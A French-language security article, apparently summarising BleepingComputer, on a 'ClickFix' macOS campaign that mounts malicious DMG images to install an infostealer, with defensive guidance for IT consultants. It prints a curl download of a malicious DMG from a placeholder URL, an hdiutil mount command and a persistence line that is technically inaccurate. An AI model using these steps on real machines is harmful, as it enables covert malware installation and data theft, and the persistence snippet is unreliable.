ClickFix : L'Attaque Silencieuse par DMG pour l'Exfiltration de Données sur macOS

Une nouvelle campagne de rançongiciel ou d'espionnage ciblant macOS utilise une technique sophistiquée pour contourner les mécanismes de sécurité en exploitant les fonctionnalités natives du système d'exploitation. Cette méthode consiste à monter silencieusement des images disque (DMG) malveillantes via des commandes Terminal pour déployer des logiciels espions capables d'exfiltrer des informations sensibles.

En bref

• Mécanisme d'Attaque : Exploitation des commandes Terminal pour monter des images DMG malveillantes sans intervention utilisateur visible.
• Charge Utile : Le malware est déployé à partir de ces images, permettant l'installation furtive d'un infostealer.
• Technique de Contournement : Utilisation des commandes système pour masquer l'activité de téléchargement et d'exécution.
• Impact : Risque élevé d'exfiltration de données sensibles (identifiants, fichiers locaux) sur les systèmes macOS compromis.

1. Anatomie de l'Attaque : Le Cycle de Vie du Malware

Cette attaque repose sur une chaîne d'actions séquentielles, chacune conçue pour minimiser la détection par les outils de sécurité traditionnels. Le processus commence par la distribution d'un fichier DMG, qui est ensuite traité par des scripts ou des commandes exécutées sur la machine cible.

1.1. Téléchargement et Préparation de l'Image

L'attaquant fournit un fichier DMG, souvent dissimulé sous une apparence légitime ou via un canal de confiance. La première étape cruciale est de préparer l'environnement pour le montage de cette image.

Pour un consultant, il est essentiel de comprendre que l'étape initiale est souvent le téléchargement du fichier, suivi de la préparation de l'environnement d'exécution.

# Exemple conceptuel de téléchargement sécurisé (à adapter selon le vecteur d'attaque réel)
curl -L -o malicious_payload.dmg [URL_MALVEILLANTE]

1.2. Montage Silencieux du DMG

L'élément central de cette attaque est le montage de l'image disque. Les attaquants exploitent des commandes qui permettent de monter un DMG sans nécessiter une interaction graphique ou une confirmation explicite de l'utilisateur, rendant l'opération invisible.

L'utilisation de commandes comme hdiutil est typique pour cette manipulation de niveau système.

# Commande pour monter l'image DMG (Exemple théorique)
hdiutil attach malicious_payload.dmg -mountpoint /Volumes/MalwareMount

Une fois monté, le contenu du DMG devient accessible comme un volume local, permettant au malware de s'exécuter ou de déployer ses composants.

1.3. Injection et Exécution du Infostealer

Une fois l'image montée, le script ou le processus lancé par le montage exécute le contenu. Ce contenu est conçu pour être un payload d'infostealer, visant à collecter des informations d'identification, des jetons de session ou des fichiers sensibles. L'exécution est souvent masquée en utilisant des techniques de process hollowing ou en s'intégrant à des processus légitimes.

2. Analyse Technique : Les Vecteurs d'Exploitation

L'efficacité de cette campagne réside dans sa capacité à utiliser des outils intégrés au système d'exploitation pour masquer ses activités. Les consultants doivent être vigilants face à l'utilisation abusive de ces outils.

2.1. L'Usage du Terminal et des Scripts Shell

Les attaquants privilégient les scripts shell (Bash, Zsh) pour orchestrer ces étapes. Ces scripts peuvent contenir des commandes complexes qui se déroulent en arrière-plan, rendant difficile l'inspection en temps réel par des outils d'analyse de processus simples.

Point de vigilance : Examiner les fichiers de démarrage (.plist dans /Library/LaunchAgents ou ~/Library/LaunchAgents) pour identifier des entrées suspectes appelant des scripts exécutant des commandes hdiutil, mount, ou des outils de réseau.

2.2. Contournement des Systèmes de Détection (EDR/AV)

Les solutions de sécurité basées sur des signatures traditionnelles peuvent échouer si l'attaque utilise des techniques fileless ou des commandes natives du système. Le fait que l'opération soit orchestrée par des commandes système légitimes (comme mount) diminue la probabilité qu'elle soit immédiatement bloquée.

Pour contrer cela, il faut passer à une analyse comportementale et une surveillance des appels système (syscall monitoring).

2.3. Persistance et Évasion

Après l'exfiltration, le malware doit assurer sa persistance. Cela peut impliquer l'ajout d'une entrée dans le launchd pour garantir que le processus de déploiement soit réactivé après un redémarrage.

# Exemple conceptuel d'ajout d'une tâche de persistance (À analyser avec prudence)
# Ceci est une simplification ; les mécanismes réels sont plus complexes.
echo 'load ~/Library/LaunchAgents/malware.plist' | sudo tee -a /Library/LaunchAgents/com.malicious.plist

3. Stratégies de Défense pour les Consultants IT

Face à ce type d'attaque, la défense doit être multicouche, combinant la prévention, la détection et la réponse rapide.

3.1. Renforcement des Politiques de Sécurité du Système

La première ligne de défense consiste à restreindre les capacités d'exécution non autorisées.

• Contrôle d'Accès aux Commandes Système : Limiter les utilisateurs non privilégiés (standard users) à exécuter des commandes critiques via des mécanismes de contrôle d'accès (PAM, Gatekeeper renforcé).
• Politiques de Sécurité du Terminal : Imposer des restrictions sur l'exécution de scripts non signés ou non vérifiés dans les sessions utilisateur.

3.2. Surveillance Avancée des Activités Système

L'analyse comportementale est indispensable pour détecter le montage de volumes inhabituels ou l'exécution de commandes suspectes.

• Monitoring des Appels Système : Utiliser des outils de Endpoint Detection and Response (EDR) capables de surveiller les appels système liés à hdiutil, mount, et aux opérations réseau inhabituelles provenant de processus non attendus.
• Analyse des Flux de Données : Surveiller les tentatives de connexion sortantes vers des adresses IP ou des domaines suspects, surtout si elles sont initiées par des processus de bureau ou des processus système de bas niveau.

3.3. Gestion Rigoureuse des Images et des Fichiers

Établir des politiques strictes concernant l'ouverture et l'exécution de fichiers externes, en particulier les formats compressés ou les images disque (DMG, ISO).

• Validation des Sources : Mettre en place des mécanismes de validation pour s'assurer que les fichiers téléchargés ou reçus proviennent de sources de confiance.
• Scanning des Fichiers : Utiliser des solutions EDR/antivirus qui effectuent des analyses heuristiques sur le contenu des fichiers DMG avant même qu'ils ne soient montés.

4. Points Clés pour la Prévention et la Réponse

Pour résumer les actions concrètes que tout consultant IT doit intégrer dans ses stratégies de sécurité macOS.

1. Audit des LaunchAgents/Daemons : Effectuer un audit régulier des répertoires de LaunchAgents pour détecter toute entrée non autorisée qui pourrait lancer des scripts complexes.
2. Principe du Moindre Privilège : S'assurer que les comptes utilisateurs quotidiens n'ont pas les droits nécessaires pour exécuter des commandes système de montage ou de manipulation de disque.
3. Surveillance des Commandes Shell : Configurer des alertes sur l'exécution de commandes hdiutil ou mount effectuées par des processus inattendus (ex: un processus d'application standard).
4. Segmentation Réseau : Isoler les postes de travail critiques pour limiter la capacité d'un malware à communiquer avec des serveurs de commande et de contrôle (C2) ou à exfiltrer des données vers l'extérieur.
5. Gestion des Mises à Jour : Maintenir le système d'exploitation et les applications critiques à jour pour bénéficier des correctifs de sécurité qui pourraient bloquer les vulnérabilités exploitées par ces campagnes.

Cette technique démontre que la menace n'est plus seulement dans le code malveillant lui-même, mais dans l'abus des capacités natives du système d'exploitation pour masquer une activité malveillante. Une posture de défense proactive, axée sur la surveillance comportementale et le contrôle strict des privilèges, est essentielle pour neutraliser ces attaques sophistiquées sur macOS.

Source : BleepingComputer